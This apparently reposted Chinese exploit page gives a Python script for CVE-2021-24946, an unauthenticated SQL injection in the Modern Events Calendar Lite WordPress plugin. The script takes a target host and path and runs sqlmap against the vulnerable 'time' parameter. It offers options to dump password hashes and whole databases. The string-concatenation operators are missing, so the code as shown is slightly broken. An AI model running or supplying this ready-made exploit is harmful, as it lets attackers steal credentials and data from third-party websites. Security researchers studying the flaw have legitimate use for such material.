WordPress 现代活动日历 6.1 SQL 注入

2022-03-03 09:19:21 浏览数 (1)

# 版本:<= 6.1

# 测试环境:Ubuntu 20.04

# CVE:CVE-2021-24946

# CWE:CWE-89

# 文档:https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md

'''

描述:

6.1.5 之前的 Modern Events Calendar Lite WordPress 插件不会清理和转义时间参数

在 mec_load_single_page AJAX 操作中的 SQL 语句中使用它之前,未经身份验证的用户可用,

导致未经身份验证的 SQL 注入问题

'''

代码语言:javascript复制
banner = '''

 .oOOOo.  o      'O o.OOoOoo                                                                                   
.O     o  O       o  O                 .oOOo. .oOOo. .oOOo.  oO             .oOOo. o   O  .oOOo. o   O  .oOOo. 
o         o       O  o                      O O    o      O   O                  O O   o  O    o O   o  O      
o         o       o  ooOO                   o o    O      o   o                  o o   o  o    O o   o  o      
o         O      O'  O       ooooooooo     O' o    o     O'   O   ooooooooo     O' OooOOo `OooOo OooOOo OoOOo. 
O         `o    o    o                    O   O    O    O     o                O       O       O     O  O    O 
`o     .o  `o  O     O                  .O    o    O  .O      O              .O        o       o     o  O    o 
 `OoooO'    `o'     ooOooOoO           oOoOoO `OooO' oOoOoO OooOO           oOoOoO     O  `OooO'     O  `OooO' 
                                                                                                               
                                                        [ ] Modern Events Calendar Lite SQL-Injection
                                                        [@] Developed by Ron Jost (Hacker5preme)

'''

print(banner)

import requests
import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH


# Exploit:
print('[*] Starting Exploit at: '   str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://'   target_ip   ':'   target_port   wp_path   r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url    retrieve_mode   exploitcode_risk
os.system(exploitcode)
print('Exploit finished at: '   str(datetime.now().strftime('%H:%M:%S')))
sql wordpress 网站建设

0 人点赞